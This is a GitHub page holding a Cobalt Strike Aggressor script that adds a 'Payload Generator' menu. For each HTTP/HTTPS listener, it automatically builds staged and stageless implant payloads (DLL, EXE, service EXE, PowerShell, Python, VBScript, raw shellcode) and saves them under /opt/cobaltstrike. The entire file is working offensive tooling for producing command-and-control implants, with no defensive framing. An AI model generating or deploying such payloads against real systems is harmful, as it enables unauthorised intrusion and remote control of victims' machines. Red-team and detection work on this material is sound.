-
Notifications
You must be signed in to change notification settings - Fork 299
/
Copy pathArtifactPayloadGenerator.cna
87 lines (80 loc) · 3.43 KB
/
ArtifactPayloadGenerator.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#Automatic Artifact Payload Generator
#Author: @r3dQu1nn
#Generates every type of Stageless/Staged Payload based off a HTTP/HTTPS Listener
#Custom Directory for Payloads
mkdir("/opt/cobaltstrike/Staged_Payloads");
mkdir("/opt/cobaltstrike/Stageless_Payloads");
menubar("Payload Generator", "payloadgenerator");
popup payloadgenerator {
item "&Automatic Artifact Payload Generator" {
prompt_confirm("Do you want to generate all the different types of Artifacts?", "Payload Generator Confirmation", {
show_message("Generating Artifacts...");
payloadgenerate();
show_message("Check /opt/cobaltstrike/ for Staged and Stageless Payloads");
});
}
}
sub payloadgenerate {
foreach $name (listeners_local()) {
$original_listener = $name;
$listener_name = lc($name);
if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
#Staged Payloads
$data = artifact_stager($original_listener, "dll");
$data2 = artifact_stager($original_listener, "exe");
$data3 = artifact_stager($original_listener, "powershell");
$data4 = artifact_stager($original_listener, "python");
$data5 = artifact_stager($original_listener, "svcexe");
$data6 = artifact_stager($original_listener, "vbscript");
$data7 = artifact_stager($original_listener, "raw");
#Write and Save Payloads
$handle = openf(">/opt/cobaltstrike/Staged_Payloads/dllpayload.dll");
writeb($handle, $data);
closef($handle);
$handle2 = openf(">/opt/cobaltstrike/Staged_Payloads/exepayload.exe");
writeb($handle2, $data2);
closef($handle2);
$handle3 = openf(">/opt/cobaltstrike/Staged_Payloads/powershellpayload.ps1");
writeb($handle3, $data3);
closef($handle3);
$handle4 = openf(">/opt/cobaltstrike/Staged_Payloads/pythonpayload.py");
writeb($handle4, $data4);
closef($handle4);
$handle5 = openf(">/opt/cobaltstrike/Staged_Payloads/svcexepayload.exe");
writeb($handle5, $data5);
closef($handle5);
$handle6 = openf(">/opt/cobaltstrike/Staged_Payloads/vbspayload.vbs");
writeb($handle6, $data6);
closef($handle6);
$handle7 = openf(">/opt/cobaltstrike/Staged_Payloads/rawpayload.bin");
writeb($handle7, $data7);
closef($handle7);
#Stageless Payloads
$data8 = artifact_payload($original_listener, "dll", "x64");
$data9 = artifact_payload($original_listener, "exe", "x86");
$data10 = artifact_payload($original_listener, "python", "x86");
$data11 = artifact_payload($original_listener, "powershell", "x86");
$data12 = artifact_payload($original_listener, "raw", "x86");
$data13 = artifact_payload($original_listener, "svcexe", "x86");
#Write and Save Payloads
$cradle = openf(">/opt/cobaltstrike/Stageless_Payloads/dllpayload.dll");
writeb($cradle, $data8);
closef($cradle);
$cradle2 = openf(">/opt/cobaltstrike/Stageless_Payloads/exepayload.exe");
writeb($cradle2, $data9);
closef($cradle2);
$cradle3 = openf(">/opt/cobaltstrike/Stageless_Payloads/powershellpayload.ps1");
writeb($cradle3, $data11);
closef($cradle3);
$cradle4 = openf(">/opt/cobaltstrike/Stageless_Payloads/rawpayload.bin");
writeb($cradle4, $data12);
closef($cradle4);
$cradle5 = openf(">/opt/cobaltstrike/Stageless_Payloads/pythonpayload.py");
writeb($cradle5, $data10);
closef($cradle5);
$cradle6 = openf(">/opt/cobaltstrike/Stageless_Payloads/svcexepayload.exe");
writeb($cradle6, $data13);
closef($cradle6);
}
}
}